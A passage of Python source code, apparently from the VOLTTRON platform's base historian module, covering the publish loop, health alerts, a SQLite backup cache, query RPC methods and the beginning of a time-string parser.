'meta': {},
'headers': headers})
@staticmethod
def _get_status_from_context(context):
status = STATUS_GOOD
if (context.get(STATUS_KEY_BACKLOGGED) or
context.get(STATUS_KEY_CACHE_FULL) or
not context.get(STATUS_KEY_PUBLISHING) or
context.get(STATUS_KEY_TIME_ERROR)):
status = STATUS_BAD
return status
def _update_status_callback(self, status, context):
self.vip.health.set_status(status, context)
def _update_status(self, updates):
context_copy, new_status = self._update_and_get_context_status(updates)
self._async_call.send(None, self._update_status_callback, new_status, context_copy)
def _send_alert_callback(self, status, context, key):
self.vip.health.set_status(status, context)
alert_status = Status()
alert_status.update_status(status, context)
self.vip.health.send_alert(key, alert_status)
def _update_and_get_context_status(self, updates):
self._current_status_context.update(updates)
context_copy = self._current_status_context.copy()
new_status = self._get_status_from_context(context_copy)
return context_copy, new_status
def _send_alert(self, updates, key):
context_copy, new_status = self._update_and_get_context_status(updates)
self._async_call.send(None, self._send_alert_callback, new_status, context_copy, key)
def _process_loop(self):
"""
The process loop is called off of the main thread and will not exit
unless the main agent is shutdown or the Agent is reconfigured.
"""
try:
self._do_process_loop()
except:
self._send_alert({STATUS_KEY_PUBLISHING: False}, "process_loop_failed")
raise
def _do_process_loop(self):
_log.debug("Starting process loop.")
current_published_count = 0
next_report_count = current_published_count + self._message_publish_count
# Sets up the concrete historian
# call this method even in case of readonly mode in case historian
# is setting up connections that are shared for both query and write
# operations
self._historian_setup() # should be called even for readonly as this
# might load the topic id name map
if self._readonly:
_log.info("Historian setup in readonly mode.")
return
backupdb = BackupDatabase(self, self._backup_storage_limit_gb,
self._backup_storage_report)
self._update_status({STATUS_KEY_CACHE_COUNT: backupdb.get_backlog_count()})
# now that everything is setup we need to make sure that the topics
# are synchronized between
# Based on the state of the back log and whether or not successful
# publishing is currently happening (and how long it's taking)
# we may or may not want to wait on the event queue for more input
# before proceeding with the rest of the loop.
wait_for_input = not bool(backupdb.get_outstanding_to_publish(1))
while True:
if not wait_for_input:
self._update_status({STATUS_KEY_BACKLOGGED: True})
try:
# _log.debug("Reading from/waiting for queue.")
new_to_publish = [
self._event_queue.get(wait_for_input, self._retry_period)]
except Empty:
_log.debug("Queue wait timed out. Falling out.")
new_to_publish = []
if new_to_publish:
# _log.debug("Checking for queue build up.")
while True:
try:
new_to_publish.append(self._event_queue.get_nowait())
except Empty:
break
# We wake the thread after a configuration change by passing a None to the queue.
# Backup anything new before checking for a stop.
cache_full = backupdb.backup_new_data(new_to_publish, bool(self._time_tolerance))
backlog_count = backupdb.get_backlog_count()
if cache_full:
self._send_alert({STATUS_KEY_CACHE_FULL: cache_full,
STATUS_KEY_BACKLOGGED: True,
STATUS_KEY_CACHE_COUNT: backlog_count,
STATUS_KEY_TIME_ERROR: backupdb.time_error_records},
"historian_cache_full")
else:
old_backlog_state = self._current_status_context[STATUS_KEY_BACKLOGGED]
state = {
STATUS_KEY_CACHE_FULL: cache_full,
STATUS_KEY_BACKLOGGED: old_backlog_state and backlog_count > 0,
STATUS_KEY_CACHE_COUNT: backlog_count,
STATUS_KEY_TIME_ERROR: backupdb.time_error_records}
self._update_status(state)
if backupdb.time_error_records:
self._send_alert(
state,
"Historian received records with invalid timestamp. Please check records in time_error table.")
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
if self._setup_failed:
# if setup failed earlier, try again.
self._historian_setup()
# if setup was successful proceed to publish loop
if not self._setup_failed:
wait_for_input = True
start_time = datetime.utcnow()
while True:
# use local variable that will be written only one time during this loop
cache_only_enabled = self.is_cache_only_enabled()
to_publish_list = backupdb.get_outstanding_to_publish(
self._submit_size_limit)
# Check to see if we are caught up.
if not to_publish_list:
if self._message_publish_count > 0 and next_report_count < current_published_count:
_log.info("Historian processed {} total records.".format(current_published_count))
next_report_count = current_published_count + self._message_publish_count
self._update_status({STATUS_KEY_BACKLOGGED: False,
STATUS_KEY_CACHE_COUNT: backupdb.get_backlog_count()})
break
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
history_limit_timestamp = None
if self._history_limit_days is not None:
last_element = to_publish_list[-1]
last_time_stamp = last_element["timestamp"]
history_limit_timestamp = last_time_stamp - self._history_limit_days
try:
if not cache_only_enabled:
self.publish_to_historian(to_publish_list)
self.manage_db_size(history_limit_timestamp, self._storage_limit_gb)
except:
_log.exception(
"An unhandled exception occurred while publishing.")
# if the success queue is empty then we need not remove
# them from the database and we are probably having connection problems.
# Update the status and send alert accordingly.
if not self._successful_published and not cache_only_enabled:
self._send_alert({STATUS_KEY_PUBLISHING: False}, "historian_not_publishing")
break
# _successful_published is set when publish_to_historian is called to the concrete
# historian. Because we don't call that function when cache_only_enabled is True
# the _successful_published will be set(). Therefore we don't need to wrap
# this call with check of cache_only_enabled
backupdb.remove_successfully_published(
self._successful_published, self._submit_size_limit)
backlog_count = backupdb.get_backlog_count()
old_backlog_state = self._current_status_context[STATUS_KEY_BACKLOGGED]
self._update_status({STATUS_KEY_PUBLISHING: True,
STATUS_KEY_BACKLOGGED: old_backlog_state and backlog_count > 0,
STATUS_KEY_CACHE_COUNT: backlog_count,
STATUS_KEY_CACHE_ONLY: cache_only_enabled})
if None in self._successful_published:
current_published_count += len(to_publish_list)
else:
current_published_count += len(self._successful_published)
if self._message_publish_count > 0:
if current_published_count >= next_report_count:
_log.info("Historian processed {} total records.".format(current_published_count))
next_report_count = current_published_count + self._message_publish_count
self._successful_published = set()
now = datetime.utcnow()
if now - start_time > self._max_time_publishing:
wait_for_input = False
break
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
backupdb.close()
try:
self.historian_teardown()
except Exception:
_log.exception("Historian teardown failed!")
_log.debug("Process loop stopped.")
self._stop_process_loop = False
def _historian_setup(self):
try:
_log.info("Trying to setup historian")
self.historian_setup()
if self._setup_failed:
self._setup_failed = False
self._update_status({STATUS_KEY_PUBLISHING: True})
except:
_log.exception("Failed to setup historian!")
self._setup_failed = True
self._send_alert({STATUS_KEY_PUBLISHING: False},
"historian_not_publishing")
def report_handled(self, record):
"""
Call this from :py:meth:`BaseHistorianAgent.publish_to_historian` to
report a record or
list of records has been successfully published and should be
removed from the cache.
:param record: Record or list of records to remove from cache.
:type record: dict or list
"""
if isinstance(record, list):
for x in record:
self._successful_published.add(x['_id'])
else:
self._successful_published.add(record['_id'])
def report_all_handled(self):
"""
Call this from :py:meth:`BaseHistorianAgent.publish_to_historian`
to report that all records passed to
:py:meth:`BaseHistorianAgent.publish_to_historian`
have been successfully published and should be removed from the cache.
"""
self._successful_published.add(None)
@abstractmethod
def publish_to_historian(self, to_publish_list):
"""
Main publishing method for historian Agents.
:param to_publish_list: List of records
:type to_publish_list: list
to_publish_list takes the following form:
.. code-block:: python
[
{
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
The contents of `meta` is not consistent. The keys in the meta data
values can be different and can
change along with the values of the meta data. It is safe to assume
that the most recent value of
the "meta" dictionary are the only values that are relevant. This is
the way the cache
treats meta data.
Once one or more records are published either
:py:meth:`BaseHistorianAgent.report_all_handled` or
:py:meth:`BaseHistorianAgent.report_handled` must be called to
report records as being published.
"""
def historian_setup(self):
"""
Optional setup routine, run in the processing thread before
main processing loop starts. Gives the Historian a chance to setup
connections in the publishing thread.
"""
def historian_teardown(self):
"""
Optional teardown routine, run in the processing thread if the main
processing loop is stopped. This happened whenever a new configuration
arrives from the config store.
"""
#TODO: Finish this.
# from collections import deque
#
# class MemoryDatabase:
# def __init__(self, owner, backup_storage_limit_gb):
# # The topic cache is only meant as a local lookup and should not be
# # accessed via the implemented historians.
# self._backup_cache = {}
# self._meta_data = defaultdict(dict)
# self._owner = weakref.ref(owner)
# self._backup_storage_limit_gb = backup_storage_limit_gb
# self._deque = deque()
#
# def get_outstanding_to_publish(self, size_limit):
# _log.debug("Getting oldest outstanding to publish.")
# results = []
#
# count = 0
# for row in self._deque:
# timestamp = row[0]
# source = row[1]
# topic = row[2]
# value = row[3]
# headers = {} if row[4] is None else row[4]
# meta = self._meta_data[(source, topic)].copy()
# results.append({'timestamp': timestamp.replace(tzinfo=pytz.UTC),
# 'source': source,
# 'topic': topic,
# 'value': value,
# 'headers': headers,
# 'meta': meta})
# count += 1
# if count >= size_limit:
# break
#
# return results
#
# def backup_new_data(self, new_publish_list):
# _log.debug("Backing up unpublished values.")
# for item in new_publish_list:
# source = item['source']
# topic = item['topic']
# readings = item['readings']
# headers = item.get('headers', {})
#
# for timestamp, value in readings:
# if timestamp is None:
# timestamp = get_aware_utc_now()
#
# self._deque.append((timestamp, source, topic, value, headers))
#
#
# def remove_successfully_published(self, successful_publishes,
# submit_size):
# _log.debug("Cleaning up successfully published values.")
# if len(self._deque) <= submit_size:
# self._deque.clear()
# return
# my_deque = self._deque
# for i in xrange(submit_size):
# my_deque.popleft()
class BackupDatabase:
"""
A creates and manages backup cache for the
:py:class:`BaseHistorianAgent` class.
Historian implementors do not need to use this class. It is for internal
use only.
"""
def __init__(self, owner, backup_storage_limit_gb, backup_storage_report,
check_same_thread=True):
# The topic cache is only meant as a local lookup and should not be
# accessed via the implemented historians.
self._backup_cache = {}
# Count of records in cache.
self._record_count = 0
self.time_error_records = False
self._meta_data = defaultdict(dict)
self._owner = weakref.ref(owner)
self._backup_storage_limit_gb = backup_storage_limit_gb
self._backup_storage_report = backup_storage_report
self._connection = None
self._setupdb(check_same_thread)
self._dupe_ids = []
self._unique_ids = []
def backup_new_data(self, new_publish_list, time_tolerance_check=False):
"""
:param new_publish_list: An iterable of records to cache to disk.
:type new_publish_list: iterable
:param time_tolerance_check: Boolean to know if time tolerance check is enabled.default =False
:returns: True if records the cache has reached a full state.
:rtype: bool
"""
#_log.debug("Backing up unpublished values.")
c = self._connection.cursor()
self.time_error_records = False # will update at the end of the method
for item in new_publish_list:
if item is None:
continue
source = item['source']
topic = item['topic']
meta = item.get('meta', {})
readings = item['readings']
headers = item.get('headers', {})
topic_id = self._backup_cache.get(topic)
if topic_id is None:
c.execute('''INSERT INTO topics values (?,?)''',
(None, topic))
c.execute('''SELECT last_insert_rowid()''')
row = c.fetchone()
topic_id = row[0]
self._backup_cache[topic_id] = topic
self._backup_cache[topic] = topic_id
meta_dict = self._meta_data[(source, topic_id)]
for name, value in meta.items():
current_meta_value = meta_dict.get(name)
if current_meta_value != value:
c.execute('''INSERT OR REPLACE INTO metadata
values(?, ?, ?, ?)''',
(source, topic_id, name, value))
meta_dict[name] = value
# Check outside loop so that we do the check inside loop only if necessary
if time_tolerance_check:
for timestamp, value in readings:
if timestamp is None:
timestamp = get_aware_utc_now()
elif headers["time_error"]:
_log.warning(f"Found data with timestamp {timestamp} that is out of configured tolerance ")
c.execute(
'''INSERT INTO time_error
values(NULL, ?, ?, ?, ?, ?)''',
(timestamp, source, topic_id, dumps(value), dumps(headers)))
self.time_error_records = True
continue # continue to the next record. don't record in outstanding
try:
c.execute(
'''INSERT INTO outstanding
values(NULL, ?, ?, ?, ?, ?)''',
(timestamp, source, topic_id, dumps(value), dumps(headers)))
self._record_count += 1
except sqlite3.IntegrityError as e:
# In the case where we are upgrading an existing installed historian the
# unique constraint may still exist on the outstanding database.
# Ignore this case.
_log.warning(f"sqlite3.Integrity error -- {e}")
pass
else:
for timestamp, value in readings:
if timestamp is None:
timestamp = get_aware_utc_now()
try:
c.execute(
'''INSERT INTO outstanding
values(NULL, ?, ?, ?, ?, ?)''',
(timestamp, source, topic_id, dumps(value), dumps(headers)))
self._record_count += 1
except sqlite3.IntegrityError as e:
# In the case where we are upgrading an existing installed historian the
# unique constraint may still exist on the outstanding database.
# Ignore this case.
_log.warning(f"sqlite3.Integrity error -- {e}")
pass
cache_full = False
if self._backup_storage_limit_gb is not None:
try:
def page_count():
c.execute("PRAGMA page_count")
return c.fetchone()[0]
def free_count():
c.execute("PRAGMA freelist_count")
return c.fetchone()[0]
p = page_count()
f = free_count()
# check if we are over the alert threshold.
if page_count() >= self.max_pages - int(self.max_pages * (1.0 - self._backup_storage_report)):
cache_full = True
# Now check if we are above the limit, if so start deleting in batches of 100
# page count doesnt update even after deleting all records
# and record count becomes zero. If we have deleted all record
# exit.
# _log.debug(f"record count before check is {self._record_count} page count is {p}"
# f" free count is {f}")
# max_pages gets updated based on inserts but freelist_count doesn't
# enter delete loop based on page_count
min_free_pages = p - self.max_pages
error_record_count = 0
get_error_count_from_db = True
while p > self.max_pages:
cache_full = True
if time_tolerance_check and get_error_count_from_db:
# if time_tolerance_check is enabled and this the first time
# we get into this loop, get the count from db
c.execute("SELECT count(ts) from time_error")
error_record_count = c.fetchone()[0]
get_error_count_from_db = False # after this we will reduce count as we delete
if error_record_count > 0:
# if time_error table has records, try deleting those first before outstanding table
_log.info("cache size exceeded limit Deleting data from time_error")
c.execute(
'''DELETE FROM time_error
WHERE ROWID IN
(SELECT ROWID FROM time_error
ORDER BY ROWID ASC LIMIT 100)''')
error_record_count -= c.rowcount
else:
# error record count is 0, sp set time_error_records to False
self.time_error_records = False
_log.info("cache size exceeded limit Deleting data from outstanding")
c.execute(
'''DELETE FROM outstanding
WHERE ROWID IN
(SELECT ROWID FROM outstanding
ORDER BY ROWID ASC LIMIT 100)''')
if self._record_count < c.rowcount:
self._record_count = 0
else:
self._record_count -= c.rowcount
p = page_count() # page count doesn't reflect delete without commit
f = free_count() # freelist count does. So using that to break from loop
if f >= min_free_pages:
break
_log.debug(f" Cleaning cache since we are over the limit. "
f"After delete of 100 records from cache"
f" record count is {self._record_count} time_error record count is {error_record_count} "
f"page count is {p} freelist count is{f}")
except Exception:
_log.exception(f"Exception when checking page count and deleting")
try:
self._connection.commit()
except Exception:
_log.exception(f"Exception in committing after back db storage")
if time_tolerance_check and not self.time_error_records:
# No time error records in this batch. Check if there are records from earlier inserts
# that admin hasn't dealt with yet.
c.execute("SELECT ROWID FROM time_error LIMIT 1")
if c.fetchone():
self.time_error_records = True
return cache_full
def remove_successfully_published(self, successful_publishes,
submit_size):
"""
Removes the reported successful publishes from the backup database.
If None is found in `successful_publishes` we assume that everything
was published.
:param successful_publishes: Set of records that was published.
:param submit_size: Number of things requested from previous call to
:py:meth:`get_outstanding_to_publish`
:type successful_publishes: set
:type submit_size: int
"""
c = self._connection.cursor()
try:
if None in successful_publishes:
c.executemany('''DELETE FROM outstanding
WHERE id = ?''',
((_id,) for _id in self._unique_ids))
if self._record_count < c.rowcount:
self._record_count = 0
else:
self._record_count -= len(self._unique_ids)
else:
temp = list(successful_publishes)
temp.sort()
c.executemany('''DELETE FROM outstanding
WHERE id = ?''',
((_id,) for _id in
successful_publishes))
self._record_count -= len(temp)
finally:
# if we don't clear these attributes on every publish, we could possibly delete a non-existing record on the next publish
self._unique_ids.clear()
self._dupe_ids.clear()
self._connection.commit()
def get_outstanding_to_publish(self, size_limit):
"""
Retrieve up to `size_limit` records from the cache. Guarantees a unique list of records,
where unique is defined as (topic, timestamp).
:param size_limit: Max number of records to retrieve.
:type size_limit: int
:returns: List of records for publication.
:rtype: list
"""
# _log.debug("Getting oldest outstanding to publish.")
c = self._connection.cursor()
c.execute('select * from outstanding order by ts limit ?', (size_limit,))
results = []
unique_records = set()
for row in c:
_id = row[0]
timestamp = row[1]
source = row[2]
topic_id = row[3]
value = loads(row[4])
headers = {} if row[5] is None else loads(row[5])
meta = self._meta_data[(source, topic_id)].copy()
topic = self._backup_cache[topic_id]
# check for duplicates before appending row to results
if (topic_id, timestamp) in unique_records:
_log.debug(f"Found duplicate from cache: {row}")
self._dupe_ids.append(_id)
continue
unique_records.add((topic_id, timestamp))
self._unique_ids.append(_id)
results.append({'_id': _id,
'timestamp': timestamp.replace(tzinfo=pytz.UTC),
'source': source,
'topic': topic,
'value': value,
'headers': headers,
'meta': meta})
c.close()
# If we were backlogged at startup and our initial estimate was
# off this will correct it.
if len(results) < size_limit:
self._record_count = len(results)
# if we have duplicates, we must count them as part of the "real" total of _record_count
if self._dupe_ids:
_log.debug(f"Adding duplicates to the total record count: {self._dupe_ids}")
self._record_count += len(self._dupe_ids)
return results
def get_backlog_count(self):
"""
Retrieve the current number of records in the cache.
"""
return self._record_count
def close(self):
self._connection.close()
self._connection = None
def _setupdb(self, check_same_thread):
""" Creates a backup database for the historian if doesn't exist."""
_log.debug("Setting up backup DB.")
if utils.is_secure_mode():
# we want to create it in the agent-data directory since agent will not have write access to any other
# directory in secure mode
backup_db = os.path.join(os.getcwd(), os.path.basename(os.getcwd()) + ".agent-data", 'backup.sqlite')
else:
backup_db = 'backup.sqlite'
_log.info(f"Creating backup db at {backup_db}")
self._connection = sqlite3.connect(
backup_db,
detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES,
check_same_thread=check_same_thread)
c = self._connection.cursor()
if self._backup_storage_limit_gb is not None:
c.execute('''PRAGMA page_size''')
page_size = c.fetchone()[0]
max_storage_bytes = self._backup_storage_limit_gb * 1024 ** 3
self.max_pages = max_storage_bytes / page_size
_log.debug(f"Max pages is {self.max_pages}")
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='outstanding';")
if c.fetchone() is None:
_log.debug("Configuring backup DB for the first time.")
self._connection.execute('''PRAGMA auto_vacuum = FULL''')
self._connection.execute('''CREATE TABLE IF NOT EXISTS outstanding
(id INTEGER PRIMARY KEY,
ts timestamp NOT NULL,
source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
value_string TEXT NOT NULL,
header_string TEXT)''')
self._record_count = 0
else:
# Check to see if we have a header_string column.
c.execute("pragma table_info(outstanding);")
name_index = 0
for description in c.description:
if description[0] == "name":
break
name_index += 1
found_header_column = False
for row in c:
if row[name_index] == "header_string":
found_header_column = True
break
if not found_header_column:
_log.info("Updating cache database to support storing header data.")
c.execute("ALTER TABLE outstanding ADD COLUMN header_string text;")
# Initialize record_count at startup.
# This is a (probably correct) estimate of the total records cached.
# We do not use count() as it can be very slow if the cache is quite large.
_log.info("Counting existing rows.")
self._connection.execute('''select
max(id)
from outstanding''')
max_id = c.fetchone()
self._connection.execute('''select
min(id)
from outstanding''')
min_id = c.fetchone()
if max_id is not None and min_id is not None:
self._record_count = max_id[0] - min_id[0] + 1
else:
self._record_count = 0
c.execute('''CREATE INDEX IF NOT EXISTS outstanding_ts_index
ON outstanding (ts)''')
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='time_error';")
if c.fetchone() is None:
_log.debug("Configuring backup DB for the first time.")
self._connection.execute('''PRAGMA auto_vacuum = FULL''')
self._connection.execute('''CREATE TABLE IF NOT EXISTS time_error
(id INTEGER PRIMARY KEY,
ts timestamp NOT NULL,
source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
value_string TEXT NOT NULL,
header_string TEXT)''')
c.execute('''CREATE INDEX time_error_ts_index ON time_error (ts)''')
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='metadata';")
if c.fetchone() is None:
self._connection.execute('''CREATE TABLE IF NOT EXISTS metadata
(source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
name TEXT NOT NULL,
value TEXT NOT NULL,
UNIQUE(topic_id, source, name))''')
else:
c.execute("SELECT * FROM metadata")
for row in c:
self._meta_data[(row[0], row[1])][row[2]] = row[3]
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='topics';")
if c.fetchone() is None:
self._connection.execute('''create table IF NOT EXISTS topics
(topic_id INTEGER PRIMARY KEY,
topic_name TEXT NOT NULL,
UNIQUE(topic_name))''')
else:
c.execute("SELECT * FROM topics")
for row in c:
self._backup_cache[row[0]] = row[1]
self._backup_cache[row[1]] = row[0]
c.close()
self._connection.commit()
# Code reimplemented from https://github.com/gilesbrown/gsqlite3
def _using_threadpool(method):
@wraps(method, ['__name__', '__doc__'])
def apply(*args, **kwargs):
return get_hub().threadpool.apply(method, args, kwargs)
return apply
class AsyncBackupDatabase(BackupDatabase):
"""Wrapper around BackupDatabase to allow it to run in the main Historian gevent loop.
Wraps the more expensive methods in threadpool.apply calls."""
def __init__(self, *args, **kwargs):
kwargs["check_same_thread"] = False
super(AsyncBackupDatabase, self).__init__(*args, **kwargs)
for method in [BackupDatabase.get_outstanding_to_publish,
BackupDatabase.remove_successfully_published,
BackupDatabase.backup_new_data,
BackupDatabase._setupdb]:
setattr(AsyncBackupDatabase, method.__name__, _using_threadpool(method))
class BaseQueryHistorianAgent(Agent):
"""This is the base agent for historian Agents that support querying of
their data stores.
"""
def __init__(self, **kwargs):
_log.debug('Constructor of BaseQueryHistorianAgent thread: {}'.format(
threading.currentThread().getName()
))
global time_parser
if time_parser is None:
if utils.is_secure_mode():
# find agent's data dir. we have write access only to that dir
for d in os.listdir(os.getcwd()):
if d.endswith(".agent-data"):
agent_data_dir = os.path.join(os.getcwd(), d)
time_parser = yacc.yacc(write_tables=0,
outputdir=agent_data_dir)
else:
time_parser = yacc.yacc(write_tables=0)
super(BaseQueryHistorianAgent, self).__init__(**kwargs)
@RPC.export
def get_version(self):
"""RPC call to get the version of the historian
:return: version number of the historian used
:rtype: string
"""
return self.version()
@abstractmethod
def version(self):
"""
Return the current version number of the historian
:return: version number
"""
@RPC.export
def get_topic_list(self):
"""RPC call to get a list of topics in data store
:return: List of topics in the data store.
:rtype: list
"""
return self.query_topic_list()
@RPC.export
def get_topics_by_pattern(self, topic_pattern):
""" Find the list of topics and its id for a given topic_pattern
:return: returns list of dictionary object {topic_name:id}"""
return self.query_topics_by_pattern(topic_pattern)
@abstractmethod
def query_topics_by_pattern(self, topic_pattern):
""" Find the list of topics and its id for a given topic_pattern
:return: returns list of dictionary object {topic_name:id}"""
pass
@abstractmethod
def query_topic_list(self):
"""
This function is called by
:py:meth:`BaseQueryHistorianAgent.get_topic_list`
to actually topic list from the data store.
:return: List of topics in the data store.
:rtype: list
"""
@RPC.export
def get_aggregate_topics(self):
"""
RPC call to get the list of aggregate topics
:return: List of aggregate topics in the data store. Each list
element contains (topic_name, aggregation_type,
aggregation_time_period, metadata)
:rtype: list
"""
return self.query_aggregate_topics()
@abstractmethod
def query_aggregate_topics(self):
"""
This function is called by
:py:meth:`BaseQueryHistorianAgent.get_aggregate_topics`
to find out the available aggregates in the data store
:return: List of tuples containing (topic_name, aggregation_type,
aggregation_time_period, metadata)
:rtype: list
"""
@RPC.export
def get_topics_metadata(self, topics):
"""
RPC call to get one or more topic's metadata
:param topics: single topic or list of topics for which metadata is
requested
:return: List of aggregate topics in the data store. Each list
element contains (topic_name, aggregation_type,
aggregation_time_period, metadata)
:rtype: list
"""
if isinstance(topics, str) or isinstance(topics, list):
return self.query_topics_metadata(topics)
else:
raise ValueError(
"Please provide a valid topic name string or "
"a list of topic names. Invalid input {}".format(topics))
@abstractmethod
def query_topics_metadata(self, topics):
"""
This function is called by
:py:meth:`BaseQueryHistorianAgent.get_topics_metadata`
to find out the metadata for the given topics
:param topics: single topic or list of topics
:type topics: str or list
:return: dictionary with the format
.. code-block:: python
{topic_name: {metadata_key:metadata_value, ...},
topic_name: {metadata_key:metadata_value, ...} ...}
:rtype: dict
"""
@RPC.export
def query(self, topic=None, start=None, end=None, agg_type=None,
agg_period=None, skip=0, count=None, order="FIRST_TO_LAST"):
"""RPC call to query an Historian for time series data.
:param topic: Topic or topics to query for.
:param start: Start time of the query. Defaults to None which is the
beginning of time.
:param end: End time of the query. Defaults to None which is the
end of time.
:param skip: Skip this number of results.
:param count: Limit results to this value.
:param order: How to order the results, either "FIRST_TO_LAST" or
"LAST_TO_FIRST"
:type topic: str or list
:type start: str
:type end: str
:param agg_type: If this is a query for aggregate data, the type of
aggregation ( for example, sum, avg)
:param agg_period: If this is a query for aggregate data, the time
period of aggregation
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
Return values will have the following form:
.. code-block:: python
{
"values": [(<timestamp string1>: value1),
(<timestamp string2>: value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
The string arguments can be either the output from
:py:func:`volttron.platform.agent.utils.format_timestamp` or the
special string "now".
Times relative to "now" may be specified with a relative time string
using the Unix "at"-style specifications. For instance "now -1h" will
specify one hour ago.
"now -1d -1h -20m" would specify 25 hours and 20 minutes ago.
"""
if topic is None:
raise TypeError('"Topic" required')
if agg_type:
if not agg_period:
raise TypeError("You should provide both aggregation type"
"(agg_type) and aggregation time period"
"(agg_period) to query aggregate data")
else:
if agg_period:
raise TypeError("You should provide both aggregation type"
"(agg_type) and aggregation time period"
"(agg_period) to query aggregate data")
if agg_period:
agg_period = AggregateHistorian.normalize_aggregation_time_period(
agg_period)
if start is not None:
try:
start = parse_timestamp_string(start)
except (ValueError, TypeError):
start = time_parser.parse(start)
if start and start.tzinfo is None:
start = start.replace(tzinfo=pytz.UTC)
if end is not None:
try:
end = parse_timestamp_string(end)
except (ValueError, TypeError):
end = time_parser.parse(end)
if end and end.tzinfo is None:
end = end.replace(tzinfo=pytz.UTC)
if start:
_log.debug("start={}".format(start))
results = self.query_historian(topic, start, end, agg_type,
agg_period, skip, count, order)
metadata = results.get("metadata", None)
values = results.get("values", None)
if values and metadata is None:
results['metadata'] = {}
return results
@abstractmethod
def query_historian(self, topic, start=None, end=None, agg_type=None,
agg_period=None, skip=0, count=None, order=None):
"""
This function is called by :py:meth:`BaseQueryHistorianAgent.query`
to actually query the data store and must return the results of a
query in the following format:
**Single topic query:**
.. code-block:: python
{
"values": [(timestamp1, value1),
(timestamp2:,value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
**Multiple topics query:**
.. code-block:: python
{
"values": {topic_name:[(timestamp1, value1),
(timestamp2:,value2),
...],
topic_name:[(timestamp1, value1),
(timestamp2:,value2),
...],
...}
"metadata": {} #empty metadata
}
Timestamps must be strings formatted by
:py:func:`volttron.platform.agent.utils.format_timestamp`.
"metadata" is not required. The caller will normalize this to {} for
you if it is missing.
:param topic: Topic or list of topics to query for.
:param start: Start of query timestamp as a datetime.
:param end: End of query timestamp as a datetime.
:param agg_type: If this is a query for aggregate data, the type of
aggregation ( for example, sum, avg)
:param agg_period: If this is a query for aggregate data, the time
period of aggregation
:param skip: Skip this number of results.
:param count: Limit results to this value. When the query is for
multiple topics, count applies to individual topics. For
example, a query on 2 topics with count=5 will return 5
records for each topic
:param order: How to order the results, either "FIRST_TO_LAST" or
"LAST_TO_FIRST"
:type topic: str or list
:type start: datetime
:type end: datetime
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
"""
class BaseHistorian(BaseHistorianAgent, BaseQueryHistorianAgent):
def __init__(self, **kwargs):
_log.debug('Constructor of BaseHistorian thread: {}'.format(
threading.currentThread().getName()
))
super(BaseHistorian, self).__init__(**kwargs)
# The following code is
# Copyright (c) 2011, 2012, Regents of the University of California
# and is under the same licence as the remainder of the code in this file.
# Modification were made to remove unneeded pieces and to fit with the
# intended use.
import ply.lex as lex
import ply.yacc as yacc
from dateutil.tz import gettz
from tzlocal import get_localzone
# use get_localzone from tzlocal instead of dateutil.tz.tzlocal as dateutil
# tzlocal does not take into account day light savings time
local = get_localzone()
def now(tzstr='UTC'):
"""Returns an aware datetime object with the current time in
tzstr timezone"""
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return datetime.now(tz)
def strptime_tz(str, format='%x %X', tzstr='Local'):
"""Returns an aware datetime object. tzstr is a timezone string such as
'US/Pacific' or 'Local' by default which uses the local timezone.
"""
dt = datetime.strptime(str, format)
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return dt.replace(tzinfo=tz)
tokens = ('NOW', "QSTRING", 'LVALUE', 'NUMBER')
reserved = {
'now': 'NOW'}
literals = '()[]*^.,<>=+-/'
time_units = re.compile('^(d|days?|h|hours?|m|minutes?|s|seconds?)$')
def get_timeunit(t):
if not time_units.match(t):
raise ValueError("Invalid timeunit: %s" % t)
if t.startswith('d'):
return 'days'
elif t.startswith('h'):
return 'hours'
elif t.startswith('m'):
return 'minutes'
elif t.startswith('s'):
return 'seconds'
def t_QSTRING(t):
r"""("[^"\\]*?(\\.[^"\\]*?)*?")|(\'[^\'\\]*?(\\.[^\'\\]*?)*?\')"""
if t.value[0] == '"':
t.value = t.value[1:-1].replace('\\"', '"')
elif t.value[0] == "'":
t.value = t.value[1:-1].replace("\\'", "'")
return t
def t_LVALUE(t):
r"""[a-zA-Z\~\$\_][a-zA-Z0-9\/\%_\-]*"""
t.type = reserved.get(t.value, 'LVALUE')
return t
def t_NUMBER(t):
r"""([+-]?([0-9]*\.)?[0-9]+)"""
if '.' in t.value:
try:
t.value = float(t.value)
except ValueError:
print("Invalid floating point number", t.value)
t.value = 0
else:
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
is_number = lambda x: isinstance(x, int) or isinstance(x, float)
t_ignore = " \t"
def t_newline(t):
r"""[\n\r]+"""
t.lexer.lineno += t.value.count("\n")
def t_error(t):
raise ValueError("Syntax Error in Query")
# print("Illegal character '%s'" % t.value[0])
# t.lexer.skip(1)
smapql_lex = lex.lex()
TIMEZONE_PATTERNS = [
"%m/%d/%Y",
"%m/%d/%Y %H:%M",
"%Y-%m-%dT%H:%M:%S",
"%Y-%m-%dT%H:%M:%S.%f",
]
def parse_time(ts):
for pat in TIMEZONE_PATTERNS:
try:
return strptime_tz(ts, pat)
except ValueError:
continue
raise ValueError("Invalid time string:" + ts)
def p_query_pair(t):
"""query : '(' timeref ',' timeref ')' """
t[0] = (t[2], t[4])
def p_query_single(t):
